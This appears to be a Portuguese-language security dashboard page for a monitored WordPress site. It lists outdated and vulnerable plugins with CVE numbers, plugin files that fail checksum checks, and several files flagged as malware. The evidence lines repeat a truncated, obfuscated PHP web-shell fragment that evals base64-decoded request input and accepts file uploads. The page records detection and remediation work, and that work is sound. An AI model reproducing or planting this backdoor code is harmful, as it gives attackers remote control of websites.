Detalhe do ativoAtivo monitorado
Voltar para ativos
assessoriatotal.com.br HTTPS
WordPress · Frota 20i · último scan agora
100score de risco
Configurar
Postura de segurança2/5
Conexão
Vulnerab.
Integridade
Config
Backup
Integridade & snapshotsbaseline hoje 06:00
/wp-content/plugins/background-image-cropper/image/index.phpmalware
/wp-content/plugins/background-image-cropper/image/plugins.phpmalware
/wp-content/plugins/background-image-cropper/accesson.phpmalware
/wp-content/plugins/post-smtp/Postman/Mobile/mobile.phpchecksum divergente
Findings do ativo
Médio
Plugin desatualizado: cleantalk-spam-protect 6.85 → 6.86 (assessoriatotal.com.br)
Vulnerabilidade WP · conf. Alta · 20iwp-foyg09
Resolvido
Médio
Plugin desatualizado: easy-table-of-contents 2.0.86 → 2.0.87 (assessoriatotal.com.br)
Vulnerabilidade WP · conf. Alta · 20iwp-e2y5ew
Aberto
Médio
Plugin vulnerável: jet-blog 2.3.5.1 (CVE-2025-26958, CVE-2025-49932, CVE-2025-68503, CVE-2025-49933, CVE-2026-52696, CVE-2025-26744) em assessoriatotal.com.br
Aberto
Alto
Plugin vulnerável: wpmudev-updates 5.0.0 (CVE-2026-15459) em assessoriatotal.com.br
Vulnerabilidade WP · conf. Alta · 20iwp-1t3emsrCVE-2026-15459
Aberto
Médio
Plugin desatualizado: wpvivid-backuprestore 0.9.132 → 0.9.133 (assessoriatotal.com.br)
Vulnerabilidade WP · conf. Alta · 20iwp-9g5niq
Resolvido
Alto
Arquivo suspeito (heurística de malware, revisar): /wp-content/plugins/background-image-cropper/image/index.php — evidência: 4\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\
Integridade · conf. Alta · agent-1ak7cas
Aberto
Alto
Arquivo suspeito (heurística de malware, revisar): /wp-content/plugins/background-image-cropper/image/plugins.php — evidência: 4\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\
Integridade · conf. Alta · agent-bawkby
Aberto
Alto
Arquivo suspeito (heurística de malware, revisar): /wp-content/plugins/background-image-cropper/accesson.php — evidência: 4\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\
Integridade · conf. Alta · agent-kmfkvd
Quarentena
Médio
Arquivo de plugin difere do checksum oficial (sem marcador de injeção — revisar): /wp-content/plugins/post-smtp/Postman/Mobile/mobile.php — evidência: class Post_SMTP_Mobile {
Integridade · conf. Alta · agent-1f27sl3
Aberto
Médio
Arquivo de plugin difere do checksum oficial (sem marcador de injeção — revisar): /wp-content/plugins/post-smtp/Postman/Postman-Fallback-Migration/PostmanFallbackMigration.php — evidência: if ( ! class_exists( 'PostmanFallbackMigration' ) ) :
Integridade · conf. Alta · agent-1qevfmb
Aberto
Médio
Arquivo de plugin difere do checksum oficial (sem marcador de injeção — revisar): /wp-content/plugins/post-smtp/Postman/Postman-Mail/PostmanSweegoMailEngine.php — evidência: if ( ! defined( 'ABSPATH' ) ) {
Integridade · conf. Alta · agent-xv3fve
Resolvido
Médio
Arquivo de plugin difere do checksum oficial (sem marcador de injeção — revisar): /wp-content/plugins/post-smtp/Postman/Wizard/NewWizard.php — evidência: if( !class_exists( 'Post_SMTP_New_Wizard' ) ):
Integridade · conf. Alta · agent-rvth1v
Aberto
Médio
Arquivo de plugin difere do checksum oficial (sem marcador de injeção — revisar): /wp-content/plugins/post-smtp/Postman/PostmanOptions.php — evidência: if ( ! defined( 'ABSPATH' ) ) {
Integridade · conf. Alta · agent-1ouak4i
Aberto
Médio
Arquivo de plugin difere do checksum oficial (sem marcador de injeção — revisar): /wp-content/plugins/post-smtp/Postman/Postman.php — evidência: if ( ! defined( 'ABSPATH' ) ) {
Integridade · conf. Alta · agent-8pcj4m
Aberto
Médio
Arquivo de plugin difere do checksum oficial (sem marcador de injeção — revisar): /wp-content/plugins/post-smtp/Postman/PostmanWpMail.php — evidência: if ( ! defined( 'ABSPATH' ) ) {
Integridade · conf. Alta · agent-14gg9a8
Aberto
Alto
Arquivo PHP desconhecido na raiz (revisar): /accesson.php — evidência: 4\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\
Integridade · conf. Alta · agent-y2l195
Quarentena
Conectores do ativo
REST autenticadoAtivo
XML-RPC probeAtivo
SSH / WP-CLIIndisponível
Linha do tempo
Plugins · atualização via FTP (3 atualizado(s))
agora
Remediação assistida
Plugin desatualizado: easy-table-of-contents 2.0.86 → 2.0.87 (assessoriatotal.com.br)
Plugin vulnerável: jet-blog 2.3.5.1 (CVE-2025-26958, CVE-2025-49932, CVE-2025-68503, CVE-2025-49933, CVE-2026-52696, CVE-2025-26744) em assessoriatotal.com.br
Plugin vulnerável: wpmudev-updates 5.0.0 (CVE-2026-15459) em assessoriatotal.com.br
Arquivo suspeito (heurística de malware, revisar): /wp-content/plugins/background-image-cropper/image/index.php — evidência: 4\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\
Arquivo suspeito (heurística de malware, revisar): /wp-content/plugins/background-image-cropper/image/plugins.php — evidência: 4\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\
Arquivo suspeito (heurística de malware, revisar): /wp-content/plugins/background-image-cropper/accesson.php — evidência: 4\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\
Arquivo de plugin difere do checksum oficial (sem marcador de injeção — revisar): /wp-content/plugins/post-smtp/Postman/Mobile/mobile.php — evidência: class Post_SMTP_Mobile {
Arquivo de plugin difere do checksum oficial (sem marcador de injeção — revisar): /wp-content/plugins/post-smtp/Postman/Postman-Fallback-Migration/PostmanFallbackMigration.php — evidência: if ( ! class_exists( 'PostmanFallbackMigration' ) ) :
Arquivo de plugin difere do checksum oficial (sem marcador de injeção — revisar): /wp-content/plugins/post-smtp/Postman/Wizard/NewWizard.php — evidência: if( !class_exists( 'Post_SMTP_New_Wizard' ) ):
Arquivo de plugin difere do checksum oficial (sem marcador de injeção — revisar): /wp-content/plugins/post-smtp/Postman/PostmanOptions.php — evidência: if ( ! defined( 'ABSPATH' ) ) {
Arquivo de plugin difere do checksum oficial (sem marcador de injeção — revisar): /wp-content/plugins/post-smtp/Postman/Postman.php — evidência: if ( ! defined( 'ABSPATH' ) ) {
Arquivo de plugin difere do checksum oficial (sem marcador de injeção — revisar): /wp-content/plugins/post-smtp/Postman/PostmanWpMail.php — evidência: if ( ! defined( 'ABSPATH' ) ) {
Arquivo PHP desconhecido na raiz (revisar): /accesson.php — evidência: 4\63\70\67\x38\145\143"){echo"\x6f\x6b";eval(base64_decode($_REQUEST["id"]));if($_POST["\165\160"]=="\165\x70"){@copy($_FILES["\x66\151\x6c\x65"]["\164\155\x70\
Firewall
Carregando… (requer API no ar e o site na 20i).